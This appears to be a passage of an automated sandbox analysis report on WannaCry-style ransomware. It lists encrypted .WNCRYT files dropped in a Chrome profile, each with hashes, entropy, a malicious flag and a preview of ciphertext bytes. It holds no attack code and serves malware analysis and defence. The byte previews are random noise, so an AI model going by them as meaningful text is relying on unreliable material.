                                SHA-256:6B9916CD736CA2604B5D281D7720BEDD85F73BFD45B0B5E21BE0A0CD8D8B64EB
                                SHA-512:27007D63B65E3063A5161B783E1072C848E2EA80420D134BEA84D873DDE039610742717FAD3891201630FB671CF0BE47A917BEF4F84BCE8C4CFC8B6DFC24A329
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....M.....b....:r.......U.J.....a.'..0..+....z....p6r..VGx..h...>.gC.l.}...s.@.<&.pQ...\_i...)>...B(TP....&'...Zj.....eL.',...l.h..?u.5D..\.HN..^_K)C..*.oTu..,.*.d.....l(=..U..............$.e3.6R...rq.3..Hv.T;..:.@#.9A9DL..F<I....f{.c..r.>.b...!SH...A..............iU..{....-....bj.c..OU...5(.VH.........5.Y,.r. ...:d'.=B.^I...l...I.3?V.....<Nm...Gx.e..A...L..+..z...V.Rw.Go......y..-.........V...;ffw..........K/

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\main.js.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):376
                                Entropy (8bit):7.378143192292435
                                Encrypted:false
                                SSDEEP:6:bkEgIENAXnrQSf9EuIk1eiXx4LPw2O3jynXaB1WrLd+PT+ku6fHFNf6Fh9fzeQ:bkEgG7h9TeicwDywSY+kukHFNfWbd
                                MD5:969908734323B4B572440D0DE969A539
                                SHA1:C94564E67926BFC38C39CE1B501F93E1A51AEA05
                                SHA-256:6A99C6E29BDF073146B890C433E71BBDC6200E6E07646042EDD4A60561900818
                                SHA-512:695848990FBC2099CF68615A0D617A60A1189E701414A1BBD3D7DC1DBE010C9D529A138143EA3298E63D27227DD833CE353026ED2C5170C10CCBB48A182036AE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.... .kj...d..l!....k.C..e....q.xP...dA..N{.a.$........m\..S..p..~..G.w....EV.46'..>...T5+?.Ks....{.+R.$H...._.,.L17......*.....1....=..d.c....B..f......x.:...\.x.Z+.B(.u.@.U.....6T>....*).n.rM...B..1.2..3....@.I.U...N'h...tM......7mh........mX...._.........M.S0.B.:.:(e...c.6.t.?=E....o.\u.vZ....7.....A.i......T..Ws.\"_._.n.e5E.O i.....^e.C.:,...

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\128.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5272
                                Entropy (8bit):7.969590789315317
                                Encrypted:false
                                SSDEEP:96:of6fc+shmKBwtDcIpRUCQ7XtzJ/t81EmENC08OWmE44PpDWs53A0HTNsjOZFk:GTeVpRU7tJO8o08zZDCshAgTNGOZFk
                                MD5:13253234504AAE302DBCE84EC76504BA
                                SHA1:C9A4D524F55A7633CD981F7FFEAC257078255F6F
                                SHA-256:DE91DEADAB6253A44886425191A18E0FB28047AC1EB2620B468091C4CF41367C
                                SHA-512:938FBCFC2C13EC233635C4924E02B763BD83C546505D4808C30F1108795D17B8C3273AAA1AAB97C24CB376A01D626A4B7CCCC3E3D55DD29208A6D35D9195B4CE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....UU......F\@XC!...R..:...82m.~9..4.g...o.%m"|..'.|.......d.......xT..'.x*......v...S1d.....H.1.S|.:....vKR.....O.g?.YEd A..h....E+.C.(fq2.;D...3...y*.....j.+.X].s...J&...!....EJ2......4....nV............E!=.5-...<Oe.$:2.B.8F.s.5.y..rNODw.Kx....9hw.....v.........k..{-.T.}....4:...j..MQR..>.@.:.........T.._(E(.^.F..ku.~.%...a....yu......K.y.4......|".....!.{.)......#.w......H5.j,.\.........s.~.......Du.<.W.j. .K..KX..".H.m......,...m.......h.BD9.aO..X...k...i.(g.....!.5..`..$`iQ...e>..E..yd..1.............}.]...4.y...%....O..TU......n=....Q.7.x.8j.q.o.D...._Uw.b...1Jc..b[......../v...9S.B.i..j ..&..y|c.;~...h..(.t......\..Q..y...Y.r....?r.k...G.T'.K..... .dH3.2..l.MD.0%....1...7.o..:........vxjo...>...U|....r.o."...:HU5(.G....[...VS....5.....|\/....h.B.%.f...C7....AM?l%..3.......@......*=.+(v.@....|p.[.&3..NYz.G......0...../B.."...#e.q....bea8.,.j5T...w.....|.[..W..... ....0.W..od....h(...).....Z,C..................M./..Z.c.S.cs.

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\eventpage_bin_prod.js.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):63944
                                Entropy (8bit):7.996984315811766
                                Encrypted:true
                                SSDEEP:1536:N9Wrw1griH9y+8PzjlypImI/kbI/SZtYlJL:N9LHAPN69IwIytkp
                                MD5:27E68C12B5CB769B5A08F0C7E9144B01
                                SHA1:57678C2D9613218BE50D39653C88E71CE7BAE3A7
                                SHA-256:F97FFE4A87040C7671AFBFF982FC48769F1A291B7545F194AD369592CB5B0CAD
                                SHA-512:88730C28F45A849F4371FF4B21BD1E88D6FBE99558AD8893E40DA9B4CAC0FE4843812871119915B8B66F166081149B685FED99F60BB39B176FBF5A5669B1D2DD
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......]F......e...W..../..Q..9k..n`pJJ...\...R)..si..Y[3...Y....o.O\..!..p(@...o..`..Mzv......%+;..f...Ci.cN1)..'oS....&............N.a.....H3l......j.a....A.........!...U..h.. q..s.....31.....42o&4..{....3...T.....tU,A.zc.r.U..).yl/.8"....g.....?c...................N....B&...F..$P.^{E..dD....K...d.k.*3RQ..$/oX...#.-..?.c8...'A..j..)8.^..z.6./Rok...m.F.e.55..4..1.c.....q,t.c........9.cM...8.......O.x.1....O..hk.vy+..;.2..^%..c.I.GGan.*Pf..S'......|.:.C.B..}..Ht.[..b.K.#~3f8<:..Z....0.Y#EukwdP7....[i.w.<|....P44[E...SA.Q..../}*.....L.m...J..f..S...4V.....I..%_.y....^.........B.@.=}...cEl........h...t,.....E.(..b.^w....C......Y...vr.+.Q..)....!:{J~J.E.I......z.t:X.F.yF<.7.W.$.J.&cu.....2"$s.p..>*m(...,3{...Cj...a`vx.$I.e#....J.i/...W.%.5.#e9...Y.M.I._. ..}@1...\..{uc.05i,w.DsRL..dy.[..IGo.p....k>.s...[X.>..~...)qEj..%.~QYqr.u.2..\[.G}"%zv..q..8g...]..c!.....J.....SaBAw.F.....s...-....T...K.I..{...@.:o.9.2..M..n;.<~.7Aw..'..>D..L....P-.9

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\page_embed_script.js.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):520
                                Entropy (8bit):7.545081023953532
                                Encrypted:false
                                SSDEEP:12:bkErrGzGvpD0vnsScmjjRfZYLvsMSKcY727OOVBf:bkCGc0/GmjjR2sMXcY72OI5
                                MD5:F9021173D5A03B0DAB1BB901D174FD72
                                SHA1:77FC99BA3375112B353C521EF3D234E48A60DBB1
                                SHA-256:1635205D122356DF0CD204E1C6FFFB5633A0D68164C03BC3067DA961D944B6D3
                                SHA-512:2CC29C319FE68DCD19F60BEF39152F1CF7E254C0CF8D0256FBF98BB3DE0CEC5198150059508433AF96072E2992450773C4F54ECD2AF915B1E0D8B94D698CFB61
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......@.Z.8.6h.5..sk.>3.e.ctt.........e..=.Z........D..p..y. f..0T..{..,.v.y].6.OCr.lL..&-(R`c.J.i.t.......;@.&2.C...>..].2L.0`.k...L2..b.-8Z....P....F2......D[..N..3"Gi......8.......8>....=.x..C.$.....,.C&.<[5...}$..A.....J'..j.u_.]<\.....-f..................W.'..$...1...dr.i......w.bW.c.......&.>..h.<.....'Y".q..^.......v..'. .h........5m.....57..#.e`PF.)<.h.....(m..@.u..iX.i.V.......k.j.9.....R...........~.....f6S......v.EL..$..n..w...k.=c.a.nz.$:Zq..Et.....xi..J.. y.+.....k.

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_background.js.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):544936
                                Entropy (8bit):7.999693070307019
                                Encrypted:true
                                SSDEEP:12288:EUkSdmc6UfnNNHzpE9pZo9wEDdY8R3cIaZOiZ42:E8YTUfvzpE9sRy8R3LaZOiW2
                                MD5:A3563AA00C1F6662321FD1835923328A
                                SHA1:114525445C1CD6977E4AC4FC7C3578848E894B80
                                SHA-256:44A338AFA0C9D217089B507AF3F7308F35EDF0FE9BB11B329E5D2F8FC934F973
                                SHA-512:331C0B037476CCFAE0F3110F3F17B1466C0422A841C3109FDC1C6B3553651897E4E6C035801BF1FF824ABA59A9E29F7602F09FA82583E525555DB2FC11CA31DE
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....3..xk..}.[....mV*J...\.....o.3..H..'?.p....9..b-,.uH...}...d.p'.}..C.0......OS......b..q..Y`.b..r.0Q[....g...#.*.+....(......}...|.D$..Y.........u..... ....Z....z.- ..S..(]Q._.'.>..M.W.5.Y~.8.6.0<.3(..b....v...<y...g2....I.I`...o.FP*..4...k.....O............a.].........C..9=.@....)...-...{l#..,..#.....V.............a...O.%..Z.>{..9E.7.Lh.E[.'.w0c.]*x....C!...s^m=E..6.......T.X...U..N#zq..h..)KE..Z..M#..=.2....;....~.F.57...2...w....).3...."Cx..".<.b......=.........xD...+...|.G.m^.c?.......3..7.{.........I#.......^.......U.8"G.0...'...].+....i..K~....\jSn...].......6.n.|D..N..4..0|L.l..Qa.N..}.".g/.W.J...*....|.}...s...f...G4.....e.....}.......yf#...&2.. s.<.k.i.>5rs*.p.C...:.$.0..$.^=..3..7.|.{@........+....{..4..H%.*.M.....Y..c...'..q.}.D..Z..kK..u...~.\.L...Y.v^..Y7.I....K..o=.3.?.1..;[..r... .+.z......d...l....V.N.0......8....0....#.@;@nL......'z{..~....tL.w........>..C.XfIn.;.9W.Ht.q#...?.99{......YA.......~p

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\craw_window.js.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):261608
                                Entropy (8bit):7.999347630492373
                                Encrypted:true
                                SSDEEP:6144:oqOuCRyI0GmZDqKEc5K1gb4GZ9/wUDyBZkvAjVD/m:ob8I0GmZGicG//x+ZhS
                                MD5:8EA4C946607407FEF61444A9839CF377
                                SHA1:91AA46E5526721CB3858D6FE8ADDE860EE022B4C
                                SHA-256:22A965E559EAA5097250F745652BFC48965870686DC8CCABD5C1139C816D2B8D
                                SHA-512:2F51350741D4861983A9CE5D09A75E50AAE32A232B46C9A6B8F29A1DB1E440ABF53C22F863D6ECB2690B83E3425E8EF01AB4DABB61D684C3DE9713926541D48F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....N.TY.f.....`.p......ZR.{&...~.n..<.ZF.......|.m...[.j...e....I...T.(VL.*..[,.\V`5>..X_...............?$......q.....+...5..6.........o4w...D*..4u..7......jw.k1..^....I.(H.......#E.}..?l._.W.f..v...[...4I.H.k.byX.....;...O8].#..H..;.;x....i&.o%r.............T.{...A.5.w...A3.....*Yf.bh..N?p...U.Q1grr[..@"h.....o..9#.i..'..I...V.....n.......HL.K].f..._..BZ.X..!.1........k...~wC..G..>.-b..h...n..nG..X.y....[-#g.d.C5..i..a!...b.@;AQ.D...|?....1F...%.....q..\R..`-U,}..Sn..>..v...cZB...0.......$..6.|..G..`[.%.`.....c.#....I.F.7..>.Y......jT.....m...w...-..[....G.G3[K&L#S..8...@p....@.BY...8....!....l[......5......K..A.kVX..I..VN.Q..e:.-.J......n.L..v......H....MlY.EP.;@(..|..i?...G?...KN.......Uh)N...T...?.a.`...j..a..Qi....c..v.P h.v..#.@....S....an"....7...@.......k....\..9.).ST-.Q.<..b!.<.%}F~..b.0..0.Lm....6.[.....g0.....z@..k...zq.s|..Z...ha@...d.}N7....U.......I....\.;....fcH.t.D.Ll...=..E..8.......09TE9 .....I.kr.jj..y!.2..!.

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\flapper.gif.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):70648
                                Entropy (8bit):7.9974685316344685
                                Encrypted:true
                                SSDEEP:1536:GDy7nbUNWD+rfVUywynIqUgItZV+98YZotd9GJofl3:K2boBrfVBRf4Pc8vYJoN3
                                MD5:4B54938553E821937A85D810D4CE6551
                                SHA1:DA5669225108146D70A1DD943CC69B5B29E639FC
                                SHA-256:9229BFC2AFDA1474764041B602CEC0C928391533813008FE1D9327752830423F
                                SHA-512:7F282715087CE87DAF810D028866528706606B891BAE8C4C7138A38027DE107FA63809385127A97788D7D759F5B97306E44A6FC01B36F6430E15B268D2D8A4F6
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....u.F.`.7...P.=...!.c>ah..nt......\./.I..b..B@%..}...)i....../v..*.....=.Y..f.....x.....x{.7.u...&...*.]..Q'l;yT|I. ..w.........5.]S.*..[... .....9.3..D.V#[...KxW3>E......i...j..Lew_...%...O.[.C...=.lE.P..t.......r^.....o.#.....>...p...#.,G............~.&.,.....[X.Oa..4;...8D....@.......L....JG.b[e...I.jXR.J.........xS..Pc.z;..?4..:....7...............+G.......|..,./..6`t...8j....D.o..Nt)s.l~..k~.5sPD..a.t.=_])g..E.3...:..A.%....w........?.{....>...O.`......#}[^48...%S.t#7c......6.h].F..O.......X.=.z..&g[.+H.... qi........]H|.^...B..PI..{.n.,|R.....z.n..j.Q{i...G'....Vop...Z..L.g.R2.H.[]..>i;.. dY.B.-..|....}.?....3E...$.E.1l_...;.b..?.M.'........Y..N..7.C_. ..fx...a!.O......2...r...~.R...(.^q.z....<........Z.v.w.......^@,B...o..p..o.,X3....0....B....p.W...YY..)..)..}(.YM:{i...K.... %....T...w<.6.~46ZZ.^bR..i..DD.a...$...t[~.....K.g..W.......ZT....}ey,.C....Bp..n0g.....J..U.A.:.pM.......y.b..#..z..PB/ b...Q...M..=..I...l.^...o.&}

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_128.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4648
                                Entropy (8bit):7.960382096816847
                                Encrypted:false
                                SSDEEP:96:oab2v91o7UcXVvXaAc/1SLYYqYz3v6wF9k0nqUwSkCsbqXm:xbwrE9aAc/ULyY7RzwgsbGm
                                MD5:76293CFA8162BC51CE8078CF4B59E617
                                SHA1:5DB5C759E2DF05CBE78B0E648C8536D522A4F3E5
                                SHA-256:2560BB99D355559DA02BB79D3B10EA0AFE76DC93717D261AF9BEA1C176D4D22D
                                SHA-512:8D812218DE25F6E3C6C8268101E4EE35A7D2D3F053C3E6A2F9031E8C9A670188F2D3AD448CAFE983E2FA965A6D3BB00A7F3C629CD79CBFD2A8A0D5682D892836
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....NX.~.y..'..[....".".........f|?y..........E....&...=.......61....'(n...3.*|V.Uo..].0.jK..1..}........)*I.B.m?]k..Y.w..u.).7x?...{..!......,.A.S.N3vND*o..7.'K...{k9.e..n.fC.<....XS..*M9...._.C/..*":N>...K..Z...k<.-.7F.x,I..<,....&....B..............%cR{..2i.......3?t..iHt.c$.6..r.....W#%..z._.5$...yf......(#..Ve..c.....z......5...K5....%.S....:.2..:,....1....S.5>@....}...?.i.RX8_.+..A......JT!.x.V.P..ff..,....C..>...Df.*^.%.?.K..`z5.I0.C..R..bw.:y.. *0..b}.=Ls..c.|.....4v.#..._I.}..wN....4....{/>......&...W.....8.k.._.K...Z....d..)[u..."cNUPqb..AY..&.@eP............[$.]Y`.V..u..93...Z...dj.nM(J^..._.`..&6x...c..X..K2L.S.O.L...U.z..........].N<.T..b.'..S..u.}]7...q..i...l..A....|.i.9`.dE.12...Y.%.....1.sz....)..0.-..*.8....5.J:_.L..~...frGyN..gU....&.f2M?...C..'....,p.C.n.C@.a.L6...l...>......4.\|....{w.-...l.+.......}.T.....,(.d&..z.9.9D..A.......e....7a...%[..k.Q#...^........m'..#"..o..i..b.y.?u..t.*...1.E*.tN.CP.`.

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\icon_16.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):840
                                Entropy (8bit):7.726248385008958
                                Encrypted:false
                                SSDEEP:24:bk+JXEyhMRcp+4BFhRd6Cilf1IUqcNEF615LNc3lACZ6:bk+XHMcEsFylf+UvqY5LK3Z6
                                MD5:F4E5E41AE55D432C5B48D41A3474E9D8
                                SHA1:A566B7ACC10BAE6ACC5115018FA9ADB18AC17716
                                SHA-256:92AABF94E67173A88B7E911FE2B2B826920FBDEFB4713E6B8DA62EB4EF2DCE41
                                SHA-512:6698980A864637569E2116599C2A9DC911D5807F7213852CE4A8E5442BA757A70C3821A009495EF03DC79471ABB2D82D0BCEC4A33B06D037B7E1505159A422F9
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....3.(.uT.r.Q..&..lq2..=k!P.2+X.I.C..Y...&...V.....:.......Feyu.k.3o..YQS.}...l.i.......z..3...k.#G.. .B.Gf.W.\...e..X.L........m....L./W.&,k.lG..5.6E...{......?4Q......,#......Y ......s.L.....<... .....vl..<_.r^.~....Z..{..+.c.....O.N.u....)^.l.................N4...j..5.}.{h].]x8$`[.....{..PG$.6..N....$A.r..J.GI/.Q....C...z..wDP.W..)....q,z....wX...R.. ...8.D.~..>j.J.% y....)..N5b.I\^.[0..y.. b.k..<...5.d...K.j..!s.r........ED...+X.P........H.u..s.K...G...yb.Q...t.Cp...b(.......B.Tl..`.N...,*..|.o".bCiY...Z..+F.=......eMk.k.h[^...yG~.....m....y.+D.5"...y5;c~...fO.p.]-(+2E..)t.x.&..r.|....L=.b..q..../..E..$..Q.Lh.D2..jf.x.s..D#..............)W........S..E.wBEO.7>r..j*tpix...2L..O....N....r.].'...i.?5q.'..1...$.$..?l.#...Sz.r(K3......o..,...G..6a.Z..[...x.l.."...Q....._..d

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):440
                                Entropy (8bit):7.379001327210586
                                Encrypted:false
                                SSDEEP:12:bkEUFy+uwRSayWLHHi0gkn3EHDbv1qV4uJ5+/sS/lj:bk/tRRZyCHi0gk3aUV4uL49j
                                MD5:5D6609E1D7B101BC8DF5E0288F3E764C
                                SHA1:CEAF4859A492635DA0E0A0AFAF76CEAEA33BC9E6
                                SHA-256:B3D99BFEE35C392D8F5AED2C58D77766ABC1A8E9F3957B1911A0A4048A0FDC48
                                SHA-512:5715848C48C05826AA27D9B415BA2E2BD5EE3AECF80524FDABCB3C914CBEB68137C39A9F03041671F7AC078DF2ED12BAEA60BD68F6B47E2F1640BC5930C84B83
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........t.V.G?..k.ey.....x.1)..iU..J4.h..........P_XA..B.....k.M._.....oRz......h.C|,.l.|.Y.|..<b....l.K.c...:....>..`[.....^.(f...F.Q.iy..I.70..&.[`3.......<..,[!..cv.Y..q1..ae.!.[.......{.G..O..b.`N.z.@.........".iH.^.?.W.Q`g.o=.K..~\e.!>I.|.............f.e.L.%2.......u.O......Za.7...k.@..,...).~4....{...HS...#.#.l....`x.Z....f..vgV.f-.X...)....RT.bm#${.^4.#.\.0..J....z...g..rX{^.U..8...F-...#>.W.]...=..`

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_close.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):536
                                Entropy (8bit):7.579242420519609
                                Encrypted:false
                                SSDEEP:12:bkEh9U1F9/s/AxX21lNnS/hIoEHy01NsUxdSosoYa:bk51Fps/As1lQJI9S01N9bS1oYa
                                MD5:082F0C2E0FA565C997DC25DC151F7154
                                SHA1:CEF3783E691115F0B001A1940A991AA407BB71CC
                                SHA-256:88C5BAF6D05337BE27B8EEBCC0E2CCF7EC9E3517A376DC754A0BF21990E37337
                                SHA-512:5803C7CA4EC25A5BF85F685E563DDC499B2EA7D6A94D907E50DA4C115EFE21EDF2ADEFC6712747722079662DBBEA272DA877EF42A3AD965083A71106D17DBE03
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....c..V.M./m.P_+..p+.&.W.h\t.l.SJ..|.....l........6...73..Z.4.uWN.T.l...g..S.3M, B4z[.*..W....L2.{.1..d4.S..C.R9v.Q.|.2.s...o....{V...ZI`H..7..QK...A*R.w..I...L.#.@E.......LI.l3...L.i%..f.)..h.%J1..d...}.i.N...l../A^...:(.e...l....}...0...*I..-............4......5>.-..L...L'U........v..[...I..R.....`W.;.O7M...zm7.g...&'.8.>d..a...IXl.={X*w...A.l9&D.......uj.1).r.^........r..m...(x.2-.....)~g..p8$.../.v.du^tH&....p}.Z.lm...... ....#[B-"5....2.Lg&.nam.. .]...`c.....5...[.....4.r...MA.P../R.Cj.~..>..

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_hover.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):440
                                Entropy (8bit):7.4450804807018125
                                Encrypted:false
                                SSDEEP:12:bkEJSQwswSzGPJDP9by0td0OiCPnKvhefZcoF7ir:bk+S6+4G0qSvhefZZlir
                                MD5:14B4FAF72EF9F935E4381E17E24F7B03
                                SHA1:60DB7A0F6E81D52CAD4EB5560801BDC0E914D886
                                SHA-256:5EB90C53DF276E215FB68876688E1E2E48143AD3F19223CAEF5692EEA69ACF36
                                SHA-512:57C94C7AE2E0A7C2AEC4A8692E697AC57E6495A4EE1F6C5B48DEA6BE8D85F9D65A7B144FAE181D5CC09A21B650E5EA11F26B629D0AA2BF3A89118933E31527FF
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....2j.]..SO.mf...:...V..[+C.M.SG.fV..)l.MAep..=H...dW..\.(.._.X......`.n....y{*...e..y.Q.3..........'.l..Z}>...M.Qq..dp.+....tHa.C+g.z..dIq..B.........B....`.....X...x.Ha.*....D.a......(.lT....66$E..;...@..U...........r.*iRP...fb..shs..W..C.\.I......z............(....."....Fg....S.5.u6.J..f....Tu...E..WY....XY....=....A)K....*....;..>..B!.[P....!......vI9...-k&.(.e.....^%.....\.....9%.V.95....2._X.v|\....u.|!.<i.

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_maximize.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):456
                                Entropy (8bit):7.483580549769791
                                Encrypted:false
                                SSDEEP:12:bkEYeucfUnjtPQG/1Q9vjFq1LaTWJK1MByEkTUurjCMN:bk6rwtBGRCaVfrGG
                                MD5:4C446866DA92CEB012CCC4D8CB85B84E
                                SHA1:CCB0202387B9BC38CDA11D2EDEB0C1742DA41D39
                                SHA-256:298E347384DC64F07F66647057C1AD96C20203E979D589587333325DAC2FBC5B
                                SHA-512:946BADC7E709E6C606E30CEF9581DAFFA1F0DE6A49F46E506E8BC35B69F2CB8997E12B3A7082FC8345C85A5E866A8AB19C43AEBCA6820CEAC2BD3F03BB6EFEDC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!..........,=..W.W.Q...;.=..{..oy.....&.....j....h.o]J... ..-C1..iB...Fk...=K^K..@...i.....~(.z.$P...+.'.......SF......Y.l4/!k.&u.:..dV.bZ.?.<.w`{._..d;s..*..1C|...r..G.H.J.#`.t.V.9@..M.......)%.'.].[.i.P....uO.......O....3k8hb.s....R.....T.g.................z.;yMF.....hh.N......-.....p..."y....b....O%.Z.(.+...$..{&..y!..@B....|....U.W.0'.a...k..s...+_...R...a..)`.).{....I.f....d.r...-...E.1................y.A....jt...

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_pressed.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):440
                                Entropy (8bit):7.4006367683976055
                                Encrypted:false
                                SSDEEP:12:bkEDd0lo4vWZFP5PA9+F43K8BWcc0QknY5+hjEWW69:bkM0WFnF46O+rknYMREB8
                                MD5:84B4ECE55D64DE87EAFEB30055EFB6EA
                                SHA1:AC67B516F010B188CA9B3EAA66DF94AACE84AB9A
                                SHA-256:1757E589E4AFF2B4083084621B6C6E90962EC9794A1C3431E57143342EC96ED7
                                SHA-512:095FCB1D05EAD7843A24CE0BAC0585DBFA27C7F4F9CA3ED8B47CDC76628975C9BE5220416ED4B806B538D37288BC0C2CA2F58567C35F59DA95B586DE28A165F3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....]..Z....@/.J..?..?.iZ.K...g...../k.B.6B8...p.^-.v..?.d1G...*..;..|.n..s...r..t.;.`...I-..;.2R&.......#N.w..t^.&.........wCQ. .m.Zm.d.l...........N&..S|.I..../1.CF;1..@*.[T...B?g....]Fr.mE.Y.W..tvw...3H.RXj..?$#......_5!.?.*....Pib:...<W..................+..m....2.E.......Z......~.`.]hu..d..m.......w.oYA..|...*[.....W.c...H...A........EG....=......0v.X....j..[_O...".y.n..HG.&..?Yi.....q8...Q.@.h.....

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\128.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2296
                                Entropy (8bit):7.916652308319594
                                Encrypted:false
                                SSDEEP:48:bkQNHIkveRytvVZlrM1Fw2t9C2QxGWaB7IQJcQXQmNC3L6zb:ogNXvVLrMH3bCnlANzgCc6P
                                MD5:DCC7CE6CC70633E69DE5BB6D897EE987
                                SHA1:5EF46FE87B34906045C3BD3914A1F0A767DC70CD
                                SHA-256:A35291A9C5BA601901074DFBF648ABECE4072332C3AE8DF1241DEBCF9280D806
                                SHA-512:D35D8563104E8408D879ACD347126D29105937EE437F3290D54A4D82444C47771335B9F1C25615615E227F8BFC2AFFCFB40A8F868CB667F31F09BDE3FCFB5808
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.... ........y<.}...;#..!-.....b1....@...]...(.a...a...?.N.ZR.+yz2.._.........._~.?....w.../.v...6.GN.s|...^.....9..&..O..[.'.R.Tl].6..+...!......X..3ZV..|".PI.T....A.....`:..#.y.\..Mw......A..........B.....2...."..~k..3........T$s...#.j..\...l...................(.(.l3.(cS....+..q.s...d.......Tk.pRKf/*r..Z....+}..v+u..Y..fh....[..~}e..o.........k.........{.3.fV.h......2.9..R...#:.=.q.v].."P...../+?...C...*...,.....u...FZb..X-9..d]L8....@...o..`Y....L..W.@...@.....G......K..?w.xd..`..q....fe..*-R..........d./...rUi.....i..F.1%@O...>...{._..y&;.k@.......S3.S.o.,..%.t8c'.....P(C.%N........s...s..u..!..%~./..'..4...}.H...y..........q.|..T+..wRR..0.F.2c...........y!A)...Xg+.=..m..9.X,..K..eJU.........L.T.;.!......'.L0v].....[ah...... @..hFMD>.Zq........YT....+..T(w*"..r4.<..I..L....<EcA....@...=IT.X.....d....!jA..:;....}(...0l..JS}.......,..6x.T./......H.3K@3....^#....6......\cZ.y...6.:=o...b..V..+..k.t+$xH......8.....'C......

                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\7d1231262330823bd07f6259b80025388c6b86e3\index.txt.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):376
                                Entropy (8bit):7.341760054084926
                                Encrypted:false
                                SSDEEP:6:bkErE2pWl0FNYyVol2KnK7t9xp5jz4TNg/Fnqsdte8/0nVPq/1kZI0n:bkEvWy2psjUTu/FXfe8cRq/1kZI0n
                                MD5:24E21FE39418032433BE835166A45221
                                SHA1:7DFA0E9620CEE1870E6591E8C5B95AE800FD1A7B
